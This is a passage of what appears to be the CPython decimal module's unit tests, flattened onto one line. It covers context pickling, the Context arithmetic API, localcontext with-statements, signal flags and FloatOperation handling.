rnd in RoundingModes: c.rounding = _testcapi.unicode_legacy_string(rnd) self.assertEqual(c.rounding, rnd) s = _testcapi.unicode_legacy_string('') self.assertRaises(TypeError, setattr, c, 'rounding', s) s = _testcapi.unicode_legacy_string('ROUND_\x00UP') self.assertRaises(TypeError, setattr, c, 'rounding', s) def test_pickle(self): for proto in range(pickle.HIGHEST_PROTOCOL + 1): Context = self.decimal.Context savedecimal = sys.modules['decimal'] # Round trip sys.modules['decimal'] = self.decimal c = Context() e = pickle.loads(pickle.dumps(c, proto)) self.assertEqual(c.prec, e.prec) self.assertEqual(c.Emin, e.Emin) self.assertEqual(c.Emax, e.Emax) self.assertEqual(c.rounding, e.rounding) self.assertEqual(c.capitals, e.capitals) self.assertEqual(c.clamp, e.clamp) self.assertEqual(c.flags, e.flags) self.assertEqual(c.traps, e.traps) # Test interchangeability combinations = [(C, P), (P, C)] if C else [(P, P)] for dumper, loader in combinations: for ri, _ in enumerate(RoundingModes): for fi, _ in enumerate(OrderedSignals[dumper]): for ti, _ in enumerate(OrderedSignals[dumper]): prec = random.randrange(1, 100) emin = random.randrange(-100, 0) emax = random.randrange(1, 100) caps = random.randrange(2) clamp = random.randrange(2) # One module dumps sys.modules['decimal'] = dumper c = dumper.Context( prec=prec, Emin=emin, Emax=emax, rounding=RoundingModes[ri], capitals=caps, clamp=clamp, flags=OrderedSignals[dumper][:fi], traps=OrderedSignals[dumper][:ti] ) s = pickle.dumps(c, proto) # The other module loads sys.modules['decimal'] = loader d = pickle.loads(s) self.assertIsInstance(d, loader.Context) self.assertEqual(d.prec, prec) self.assertEqual(d.Emin, emin) self.assertEqual(d.Emax, emax) self.assertEqual(d.rounding, RoundingModes[ri]) self.assertEqual(d.capitals, caps) self.assertEqual(d.clamp, clamp) assert_signals(self, d, 'flags', OrderedSignals[loader][:fi]) assert_signals(self, d, 'traps', OrderedSignals[loader][:ti]) sys.modules['decimal'] = savedecimal def test_equality_with_other_types(self): Decimal = self.decimal.Decimal self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}]) self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}]) def test_copy(self): # All copies should be deep Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.copy() self.assertNotEqual(id(c), id(d)) self.assertNotEqual(id(c.flags), id(d.flags)) self.assertNotEqual(id(c.traps), id(d.traps)) k1 = set(c.flags.keys()) k2 = set(d.flags.keys()) self.assertEqual(k1, k2) self.assertEqual(c.flags, d.flags) def test__clamp(self): # In Python 3.2, the private attribute `_clamp` was made # public (issue 8540), with the old `_clamp` becoming a # property wrapping `clamp`. For the duration of Python 3.2 # only, the attribute should be gettable/settable via both # `clamp` and `_clamp`; in Python 3.3, `_clamp` should be # removed. Context = self.decimal.Context c = Context() self.assertRaises(AttributeError, getattr, c, '_clamp') def test_abs(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.abs(Decimal(-1)) self.assertEqual(c.abs(-1), d) self.assertRaises(TypeError, c.abs, '-1') def test_add(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.add(Decimal(1), Decimal(1)) self.assertEqual(c.add(1, 1), d) self.assertEqual(c.add(Decimal(1), 1), d) self.assertEqual(c.add(1, Decimal(1)), d) self.assertRaises(TypeError, c.add, '1', 1) self.assertRaises(TypeError, c.add, 1, '1') def test_compare(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.compare(Decimal(1), Decimal(1)) self.assertEqual(c.compare(1, 1), d) self.assertEqual(c.compare(Decimal(1), 1), d) self.assertEqual(c.compare(1, Decimal(1)), d) self.assertRaises(TypeError, c.compare, '1', 1) self.assertRaises(TypeError, c.compare, 1, '1') def test_compare_signal(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.compare_signal(Decimal(1), Decimal(1)) self.assertEqual(c.compare_signal(1, 1), d) self.assertEqual(c.compare_signal(Decimal(1), 1), d) self.assertEqual(c.compare_signal(1, Decimal(1)), d) self.assertRaises(TypeError, c.compare_signal, '1', 1) self.assertRaises(TypeError, c.compare_signal, 1, '1') def test_compare_total(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.compare_total(Decimal(1), Decimal(1)) self.assertEqual(c.compare_total(1, 1), d) self.assertEqual(c.compare_total(Decimal(1), 1), d) self.assertEqual(c.compare_total(1, Decimal(1)), d) self.assertRaises(TypeError, c.compare_total, '1', 1) self.assertRaises(TypeError, c.compare_total, 1, '1') def test_compare_total_mag(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.compare_total_mag(Decimal(1), Decimal(1)) self.assertEqual(c.compare_total_mag(1, 1), d) self.assertEqual(c.compare_total_mag(Decimal(1), 1), d) self.assertEqual(c.compare_total_mag(1, Decimal(1)), d) self.assertRaises(TypeError, c.compare_total_mag, '1', 1) self.assertRaises(TypeError, c.compare_total_mag, 1, '1') def test_copy_abs(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.copy_abs(Decimal(-1)) self.assertEqual(c.copy_abs(-1), d) self.assertRaises(TypeError, c.copy_abs, '-1') def test_copy_decimal(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.copy_decimal(Decimal(-1)) self.assertEqual(c.copy_decimal(-1), d) self.assertRaises(TypeError, c.copy_decimal, '-1') def test_copy_negate(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.copy_negate(Decimal(-1)) self.assertEqual(c.copy_negate(-1), d) self.assertRaises(TypeError, c.copy_negate, '-1') def test_copy_sign(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.copy_sign(Decimal(1), Decimal(-2)) self.assertEqual(c.copy_sign(1, -2), d) self.assertEqual(c.copy_sign(Decimal(1), -2), d) self.assertEqual(c.copy_sign(1, Decimal(-2)), d) self.assertRaises(TypeError, c.copy_sign, '1', -2) self.assertRaises(TypeError, c.copy_sign, 1, '-2') def test_divide(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.divide(Decimal(1), Decimal(2)) self.assertEqual(c.divide(1, 2), d) self.assertEqual(c.divide(Decimal(1), 2), d) self.assertEqual(c.divide(1, Decimal(2)), d) self.assertRaises(TypeError, c.divide, '1', 2) self.assertRaises(TypeError, c.divide, 1, '2') def test_divide_int(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.divide_int(Decimal(1), Decimal(2)) self.assertEqual(c.divide_int(1, 2), d) self.assertEqual(c.divide_int(Decimal(1), 2), d) self.assertEqual(c.divide_int(1, Decimal(2)), d) self.assertRaises(TypeError, c.divide_int, '1', 2) self.assertRaises(TypeError, c.divide_int, 1, '2') def test_divmod(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.divmod(Decimal(1), Decimal(2)) self.assertEqual(c.divmod(1, 2), d) self.assertEqual(c.divmod(Decimal(1), 2), d) self.assertEqual(c.divmod(1, Decimal(2)), d) self.assertRaises(TypeError, c.divmod, '1', 2) self.assertRaises(TypeError, c.divmod, 1, '2') def test_exp(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.exp(Decimal(10)) self.assertEqual(c.exp(10), d) self.assertRaises(TypeError, c.exp, '10') def test_fma(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.fma(Decimal(2), Decimal(3), Decimal(4)) self.assertEqual(c.fma(2, 3, 4), d) self.assertEqual(c.fma(Decimal(2), 3, 4), d) self.assertEqual(c.fma(2, Decimal(3), 4), d) self.assertEqual(c.fma(2, 3, Decimal(4)), d) self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d) self.assertRaises(TypeError, c.fma, '2', 3, 4) self.assertRaises(TypeError, c.fma, 2, '3', 4) self.assertRaises(TypeError, c.fma, 2, 3, '4') # Issue 12079 for Context.fma ... self.assertRaises(TypeError, c.fma, Decimal('Infinity'), Decimal(0), "not a decimal") self.assertRaises(TypeError, c.fma, Decimal(1), Decimal('snan'), 1.222) # ... and for Decimal.fma. self.assertRaises(TypeError, Decimal('Infinity').fma, Decimal(0), "not a decimal") self.assertRaises(TypeError, Decimal(1).fma, Decimal('snan'), 1.222) def test_is_finite(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.is_finite(Decimal(10)) self.assertEqual(c.is_finite(10), d) self.assertRaises(TypeError, c.is_finite, '10') def test_is_infinite(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.is_infinite(Decimal(10)) self.assertEqual(c.is_infinite(10), d) self.assertRaises(TypeError, c.is_infinite, '10') def test_is_nan(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.is_nan(Decimal(10)) self.assertEqual(c.is_nan(10), d) self.assertRaises(TypeError, c.is_nan, '10') def test_is_normal(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.is_normal(Decimal(10)) self.assertEqual(c.is_normal(10), d) self.assertRaises(TypeError, c.is_normal, '10') def test_is_qnan(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.is_qnan(Decimal(10)) self.assertEqual(c.is_qnan(10), d) self.assertRaises(TypeError, c.is_qnan, '10') def test_is_signed(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.is_signed(Decimal(10)) self.assertEqual(c.is_signed(10), d) self.assertRaises(TypeError, c.is_signed, '10') def test_is_snan(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.is_snan(Decimal(10)) self.assertEqual(c.is_snan(10), d) self.assertRaises(TypeError, c.is_snan, '10') def test_is_subnormal(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.is_subnormal(Decimal(10)) self.assertEqual(c.is_subnormal(10), d) self.assertRaises(TypeError, c.is_subnormal, '10') def test_is_zero(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.is_zero(Decimal(10)) self.assertEqual(c.is_zero(10), d) self.assertRaises(TypeError, c.is_zero, '10') def test_ln(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.ln(Decimal(10)) self.assertEqual(c.ln(10), d) self.assertRaises(TypeError, c.ln, '10') def test_log10(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.log10(Decimal(10)) self.assertEqual(c.log10(10), d) self.assertRaises(TypeError, c.log10, '10') def test_logb(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.logb(Decimal(10)) self.assertEqual(c.logb(10), d) self.assertRaises(TypeError, c.logb, '10') def test_logical_and(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.logical_and(Decimal(1), Decimal(1)) self.assertEqual(c.logical_and(1, 1), d) self.assertEqual(c.logical_and(Decimal(1), 1), d) self.assertEqual(c.logical_and(1, Decimal(1)), d) self.assertRaises(TypeError, c.logical_and, '1', 1) self.assertRaises(TypeError, c.logical_and, 1, '1') def test_logical_invert(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.logical_invert(Decimal(1000)) self.assertEqual(c.logical_invert(1000), d) self.assertRaises(TypeError, c.logical_invert, '1000') def test_logical_or(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.logical_or(Decimal(1), Decimal(1)) self.assertEqual(c.logical_or(1, 1), d) self.assertEqual(c.logical_or(Decimal(1), 1), d) self.assertEqual(c.logical_or(1, Decimal(1)), d) self.assertRaises(TypeError, c.logical_or, '1', 1) self.assertRaises(TypeError, c.logical_or, 1, '1') def test_logical_xor(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.logical_xor(Decimal(1), Decimal(1)) self.assertEqual(c.logical_xor(1, 1), d) self.assertEqual(c.logical_xor(Decimal(1), 1), d) self.assertEqual(c.logical_xor(1, Decimal(1)), d) self.assertRaises(TypeError, c.logical_xor, '1', 1) self.assertRaises(TypeError, c.logical_xor, 1, '1') def test_max(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.max(Decimal(1), Decimal(2)) self.assertEqual(c.max(1, 2), d) self.assertEqual(c.max(Decimal(1), 2), d) self.assertEqual(c.max(1, Decimal(2)), d) self.assertRaises(TypeError, c.max, '1', 2) self.assertRaises(TypeError, c.max, 1, '2') def test_max_mag(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.max_mag(Decimal(1), Decimal(2)) self.assertEqual(c.max_mag(1, 2), d) self.assertEqual(c.max_mag(Decimal(1), 2), d) self.assertEqual(c.max_mag(1, Decimal(2)), d) self.assertRaises(TypeError, c.max_mag, '1', 2) self.assertRaises(TypeError, c.max_mag, 1, '2') def test_min(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.min(Decimal(1), Decimal(2)) self.assertEqual(c.min(1, 2), d) self.assertEqual(c.min(Decimal(1), 2), d) self.assertEqual(c.min(1, Decimal(2)), d) self.assertRaises(TypeError, c.min, '1', 2) self.assertRaises(TypeError, c.min, 1, '2') def test_min_mag(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.min_mag(Decimal(1), Decimal(2)) self.assertEqual(c.min_mag(1, 2), d) self.assertEqual(c.min_mag(Decimal(1), 2), d) self.assertEqual(c.min_mag(1, Decimal(2)), d) self.assertRaises(TypeError, c.min_mag, '1', 2) self.assertRaises(TypeError, c.min_mag, 1, '2') def test_minus(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.minus(Decimal(10)) self.assertEqual(c.minus(10), d) self.assertRaises(TypeError, c.minus, '10') def test_multiply(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.multiply(Decimal(1), Decimal(2)) self.assertEqual(c.multiply(1, 2), d) self.assertEqual(c.multiply(Decimal(1), 2), d) self.assertEqual(c.multiply(1, Decimal(2)), d) self.assertRaises(TypeError, c.multiply, '1', 2) self.assertRaises(TypeError, c.multiply, 1, '2') def test_next_minus(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.next_minus(Decimal(10)) self.assertEqual(c.next_minus(10), d) self.assertRaises(TypeError, c.next_minus, '10') def test_next_plus(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.next_plus(Decimal(10)) self.assertEqual(c.next_plus(10), d) self.assertRaises(TypeError, c.next_plus, '10') def test_next_toward(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.next_toward(Decimal(1), Decimal(2)) self.assertEqual(c.next_toward(1, 2), d) self.assertEqual(c.next_toward(Decimal(1), 2), d) self.assertEqual(c.next_toward(1, Decimal(2)), d) self.assertRaises(TypeError, c.next_toward, '1', 2) self.assertRaises(TypeError, c.next_toward, 1, '2') def test_normalize(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.normalize(Decimal(10)) self.assertEqual(c.normalize(10), d) self.assertRaises(TypeError, c.normalize, '10') def test_number_class(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() self.assertEqual(c.number_class(123), c.number_class(Decimal(123))) self.assertEqual(c.number_class(0), c.number_class(Decimal(0))) self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45))) def test_plus(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.plus(Decimal(10)) self.assertEqual(c.plus(10), d) self.assertRaises(TypeError, c.plus, '10') def test_power(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.power(Decimal(1), Decimal(4)) self.assertEqual(c.power(1, 4), d) self.assertEqual(c.power(Decimal(1), 4), d) self.assertEqual(c.power(1, Decimal(4)), d) self.assertEqual(c.power(Decimal(1), Decimal(4)), d) self.assertRaises(TypeError, c.power, '1', 4) self.assertRaises(TypeError, c.power, 1, '4') self.assertEqual(c.power(modulo=5, b=8, a=2), 1) def test_quantize(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.quantize(Decimal(1), Decimal(2)) self.assertEqual(c.quantize(1, 2), d) self.assertEqual(c.quantize(Decimal(1), 2), d) self.assertEqual(c.quantize(1, Decimal(2)), d) self.assertRaises(TypeError, c.quantize, '1', 2) self.assertRaises(TypeError, c.quantize, 1, '2') def test_remainder(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.remainder(Decimal(1), Decimal(2)) self.assertEqual(c.remainder(1, 2), d) self.assertEqual(c.remainder(Decimal(1), 2), d) self.assertEqual(c.remainder(1, Decimal(2)), d) self.assertRaises(TypeError, c.remainder, '1', 2) self.assertRaises(TypeError, c.remainder, 1, '2') def test_remainder_near(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.remainder_near(Decimal(1), Decimal(2)) self.assertEqual(c.remainder_near(1, 2), d) self.assertEqual(c.remainder_near(Decimal(1), 2), d) self.assertEqual(c.remainder_near(1, Decimal(2)), d) self.assertRaises(TypeError, c.remainder_near, '1', 2) self.assertRaises(TypeError, c.remainder_near, 1, '2') def test_rotate(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.rotate(Decimal(1), Decimal(2)) self.assertEqual(c.rotate(1, 2), d) self.assertEqual(c.rotate(Decimal(1), 2), d) self.assertEqual(c.rotate(1, Decimal(2)), d) self.assertRaises(TypeError, c.rotate, '1', 2) self.assertRaises(TypeError, c.rotate, 1, '2') def test_sqrt(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.sqrt(Decimal(10)) self.assertEqual(c.sqrt(10), d) self.assertRaises(TypeError, c.sqrt, '10') def test_same_quantum(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.same_quantum(Decimal(1), Decimal(2)) self.assertEqual(c.same_quantum(1, 2), d) self.assertEqual(c.same_quantum(Decimal(1), 2), d) self.assertEqual(c.same_quantum(1, Decimal(2)), d) self.assertRaises(TypeError, c.same_quantum, '1', 2) self.assertRaises(TypeError, c.same_quantum, 1, '2') def test_scaleb(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.scaleb(Decimal(1), Decimal(2)) self.assertEqual(c.scaleb(1, 2), d) self.assertEqual(c.scaleb(Decimal(1), 2), d) self.assertEqual(c.scaleb(1, Decimal(2)), d) self.assertRaises(TypeError, c.scaleb, '1', 2) self.assertRaises(TypeError, c.scaleb, 1, '2') def test_shift(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.shift(Decimal(1), Decimal(2)) self.assertEqual(c.shift(1, 2), d) self.assertEqual(c.shift(Decimal(1), 2), d) self.assertEqual(c.shift(1, Decimal(2)), d) self.assertRaises(TypeError, c.shift, '1', 2) self.assertRaises(TypeError, c.shift, 1, '2') def test_subtract(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.subtract(Decimal(1), Decimal(2)) self.assertEqual(c.subtract(1, 2), d) self.assertEqual(c.subtract(Decimal(1), 2), d) self.assertEqual(c.subtract(1, Decimal(2)), d) self.assertRaises(TypeError, c.subtract, '1', 2) self.assertRaises(TypeError, c.subtract, 1, '2') def test_to_eng_string(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.to_eng_string(Decimal(10)) self.assertEqual(c.to_eng_string(10), d) self.assertRaises(TypeError, c.to_eng_string, '10') def test_to_sci_string(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.to_sci_string(Decimal(10)) self.assertEqual(c.to_sci_string(10), d) self.assertRaises(TypeError, c.to_sci_string, '10') def test_to_integral_exact(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.to_integral_exact(Decimal(10)) self.assertEqual(c.to_integral_exact(10), d) self.assertRaises(TypeError, c.to_integral_exact, '10') def test_to_integral_value(self): Decimal = self.decimal.Decimal Context = self.decimal.Context c = Context() d = c.to_integral_value(Decimal(10)) self.assertEqual(c.to_integral_value(10), d) self.assertRaises(TypeError, c.to_integral_value, '10') self.assertRaises(TypeError, c.to_integral_value, 10, 'x') class CContextAPItests(ContextAPItests): decimal = C class PyContextAPItests(ContextAPItests): decimal = P class ContextWithStatement(unittest.TestCase): # Can't do these as docstrings until Python 2.6 # as doctest can't handle __future__ statements def test_localcontext(self): # Use a copy of the current context in the block getcontext = self.decimal.getcontext localcontext = self.decimal.localcontext orig_ctx = getcontext() with localcontext() as enter_ctx: set_ctx = getcontext() final_ctx = getcontext() self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly') self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context') self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context') def test_localcontextarg(self): # Use a copy of the supplied context in the block Context = self.decimal.Context getcontext = self.decimal.getcontext localcontext = self.decimal.localcontext localcontext = self.decimal.localcontext orig_ctx = getcontext() new_ctx = Context(prec=42) with localcontext(new_ctx) as enter_ctx: set_ctx = getcontext() final_ctx = getcontext() self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly') self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context') self.assertIsNot(new_ctx, set_ctx, 'did not copy the context') self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context') def test_nested_with_statements(self): # Use a copy of the supplied context in the block Decimal = self.decimal.Decimal Context = self.decimal.Context getcontext = self.decimal.getcontext localcontext = self.decimal.localcontext Clamped = self.decimal.Clamped Overflow = self.decimal.Overflow orig_ctx = getcontext() orig_ctx.clear_flags() new_ctx = Context(Emax=384) with localcontext() as c1: self.assertEqual(c1.flags, orig_ctx.flags) self.assertEqual(c1.traps, orig_ctx.traps) c1.traps[Clamped] = True c1.Emin = -383 self.assertNotEqual(orig_ctx.Emin, -383) self.assertRaises(Clamped, c1.create_decimal, '0e-999') self.assertTrue(c1.flags[Clamped]) with localcontext(new_ctx) as c2: self.assertEqual(c2.flags, new_ctx.flags) self.assertEqual(c2.traps, new_ctx.traps) self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2) self.assertFalse(c2.flags[Clamped]) self.assertTrue(c2.flags[Overflow]) del c2 self.assertFalse(c1.flags[Overflow]) del c1 self.assertNotEqual(orig_ctx.Emin, -383) self.assertFalse(orig_ctx.flags[Clamped]) self.assertFalse(orig_ctx.flags[Overflow]) self.assertFalse(new_ctx.flags[Clamped]) self.assertFalse(new_ctx.flags[Overflow]) def test_with_statements_gc1(self): localcontext = self.decimal.localcontext with localcontext() as c1: del c1 with localcontext() as c2: del c2 with localcontext() as c3: del c3 with localcontext() as c4: del c4 def test_with_statements_gc2(self): localcontext = self.decimal.localcontext with localcontext() as c1: with localcontext(c1) as c2: del c1 with localcontext(c2) as c3: del c2 with localcontext(c3) as c4: del c3 del c4 def test_with_statements_gc3(self): Context = self.decimal.Context localcontext = self.decimal.localcontext getcontext = self.decimal.getcontext setcontext = self.decimal.setcontext with localcontext() as c1: del c1 n1 = Context(prec=1) setcontext(n1) with localcontext(n1) as c2: del n1 self.assertEqual(c2.prec, 1) del c2 n2 = Context(prec=2) setcontext(n2) del n2 self.assertEqual(getcontext().prec, 2) n3 = Context(prec=3) setcontext(n3) self.assertEqual(getcontext().prec, 3) with localcontext(n3) as c3: del n3 self.assertEqual(c3.prec, 3) del c3 n4 = Context(prec=4) setcontext(n4) del n4 self.assertEqual(getcontext().prec, 4) with localcontext() as c4: self.assertEqual(c4.prec, 4) del c4 class CContextWithStatement(ContextWithStatement): decimal = C class PyContextWithStatement(ContextWithStatement): decimal = P class ContextFlags(unittest.TestCase): def test_flags_irrelevant(self): # check that the result (numeric result + flags raised) of an # arithmetic operation doesn't depend on the current flags Decimal = self.decimal.Decimal Context = self.decimal.Context Inexact = self.decimal.Inexact Rounded = self.decimal.Rounded Underflow = self.decimal.Underflow Clamped = self.decimal.Clamped Subnormal = self.decimal.Subnormal def raise_error(context, flag): if self.decimal == C: context.flags[flag] = True if context.traps[flag]: raise flag else: context._raise_error(flag) context = Context(prec=9, Emin = -425000000, Emax = 425000000, rounding=ROUND_HALF_EVEN, traps=[], flags=[]) # operations that raise various flags, in the form (function, arglist) operations = [ (context._apply, [Decimal("100E-425000010")]), (context.sqrt, [Decimal(2)]), (context.add, [Decimal("1.23456789"), Decimal("9.87654321")]), (context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]), (context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]), ] # try various flags individually, then a whole lot at once flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal], [Inexact, Rounded, Underflow, Clamped, Subnormal]] for fn, args in operations: # find answer and flags raised using a clean context context.clear_flags() ans = fn(*args) flags = [k for k, v in context.flags.items() if v] for extra_flags in flagsets: # set flags, before calling operation context.clear_flags() for flag in extra_flags: raise_error(context, flag) new_ans = fn(*args) # flags that we expect to be set after the operation expected_flags = list(flags) for flag in extra_flags: if flag not in expected_flags: expected_flags.append(flag) expected_flags.sort(key=id) # flags we actually got new_flags = [k for k,v in context.flags.items() if v] new_flags.sort(key=id) self.assertEqual(ans, new_ans, "operation produces different answers depending on flags set: " + "expected %s, got %s." % (ans, new_ans)) self.assertEqual(new_flags, expected_flags, "operation raises different flags depending on flags set: " + "expected %s, got %s" % (expected_flags, new_flags)) def test_flag_comparisons(self): Context = self.decimal.Context Inexact = self.decimal.Inexact Rounded = self.decimal.Rounded c = Context() # Valid SignalDict self.assertNotEqual(c.flags, c.traps) self.assertNotEqual(c.traps, c.flags) c.flags = c.traps self.assertEqual(c.flags, c.traps) self.assertEqual(c.traps, c.flags) c.flags[Rounded] = True c.traps = c.flags self.assertEqual(c.flags, c.traps) self.assertEqual(c.traps, c.flags) d = {} d.update(c.flags) self.assertEqual(d, c.flags) self.assertEqual(c.flags, d) d[Inexact] = True self.assertNotEqual(d, c.flags) self.assertNotEqual(c.flags, d) # Invalid SignalDict d = {Inexact:False} self.assertNotEqual(d, c.flags) self.assertNotEqual(c.flags, d) d = ["xyz"] self.assertNotEqual(d, c.flags) self.assertNotEqual(c.flags, d) @requires_IEEE_754 def test_float_operation(self): Decimal = self.decimal.Decimal FloatOperation = self.decimal.FloatOperation localcontext = self.decimal.localcontext with localcontext() as c: ##### trap is off by default self.assertFalse(c.traps[FloatOperation]) # implicit conversion sets the flag c.clear_flags() self.assertEqual(Decimal(7.5), 7.5) self.assertTrue(c.flags[FloatOperation]) c.clear_flags() self.assertEqual(c.create_decimal(7.5), 7.5) self.assertTrue(c.flags[FloatOperation]) # explicit conversion does not set the flag c.clear_flags() x = Decimal.from_float(7.5) self.assertFalse(c.flags[FloatOperation]) # comparison sets the flag self.assertEqual(x, 7.5) self.assertTrue(c.flags[FloatOperation]) c.clear_flags() x = c.create_decimal_from_float(7.5) self.assertFalse(c.flags[FloatOperation]) self.assertEqual(x, 7.5) self.assertTrue(c.flags[FloatOperation]) ##### set the trap c.traps[FloatOperation] = True # implicit conversion raises c.clear_flags() self.assertRaises(FloatOperation, Decimal, 7.5) self.assertTrue(c.flags[FloatOperation]) c.clear_flags() self.assertRaises(FloatOperation, c.create_decimal, 7.5) self.assertTrue(c.flags[FloatOperation]) # explicit conversion is silent c.clear_flags() x = Decimal.from_float(7.5) self.assertFalse(c.flags[FloatOperation]) c.clear_flags() x = c.create_decimal_from_float(7.5) self.assertFalse(c.flags[FloatOperation]) def test_float_comparison(self): Decimal = self.decimal.Decimal Context = self.decimal.Context FloatOperation = self.decimal.FloatOperation localcontext = self.decimal.localcontext def assert_attr(a, b, attr, context, signal=None): context.clear_flags() f = getattr(a, attr) if signal == FloatOperation: self.assertRaises(signal, f, b) else: self.assertIs(f(b), True) self.assertTrue(context.flags[FloatOperation]) small_d = Decimal('0.25') big_d = Decimal('3.0') small_f = 0.25 big_f = 3.0 zero_d = Decimal('0.0') neg_zero_d = Decimal('-0.0') zero_f = 0.0 neg_zero_f = -0.0 inf_d = Decimal('Infinity') neg_inf_d = Decimal('-Infinity') inf_f = float('inf') neg_inf_f = float('-inf') def doit(c, signal=None): # Order for attr in '__lt__', '__le__': assert_attr(small_d, big_f, attr, c, signal) for attr in '__gt__', '__ge__': assert_attr(big_d, small_f, attr, c, signal) # Equality assert_attr(small_d, small_f, '__eq__', c, None) assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None) assert_attr(neg_zero_d, zero_f, '__eq__', c, None) assert_attr(zero_d, neg_zero_f, '__eq__', c, None) assert_attr(zero_d, zero_f, '__eq__', c, None) assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None) assert_attr(inf_d, inf_f, '__eq__', c, None) # Inequality assert_attr(small_d, big_f, '__ne__', c, None) assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None) assert_attr(neg_inf_d, inf_f, '__ne__', c, None) assert_attr(inf_d, neg_inf_f, '__ne__', c, None) assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None) def test_containers(c, signal=None): c.clear_flags() s = set([100.0, Decimal('100.0')]) self.assertEqual(len(s), 1) self.assertTrue(c.flags[FloatOperation]) c.clear_flags() if signal: self.assertRaises(signal, sorted, [1.0, Decimal('10.0')]) else: s = sorted([10.0, Decimal('10.0')]) self.assertTrue(c.flags[FloatOperation]) c.clear_flags() b = 10.0 in [Decimal('10.0'), 1.0] self.assertTrue(c.flags[FloatOperation]) c.clear_flags() b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'} self.assertTrue(c.flags[FloatOperation]) nc = Context() with localcontext(nc) as c: self.assertFalse(c.traps[FloatOperation]) doit(c, signal=None) test_containers(c, signal=None) c.traps[FloatOperation] = True doit(c, signal=FloatOperation) test_containers(c, signal=FloatOperation) def test_float_operation_default(self): Decimal = self.decimal.Decimal Context = self.decimal.Context Inexact = self.decimal.Inexact FloatOperation= self.decimal.FloatOperation context = Context() self.assertFalse(context.flags[FloatOperation]) self.assertFalse(context.traps[FloatOperation]) context.clear_traps() context.traps[Inexact] = True 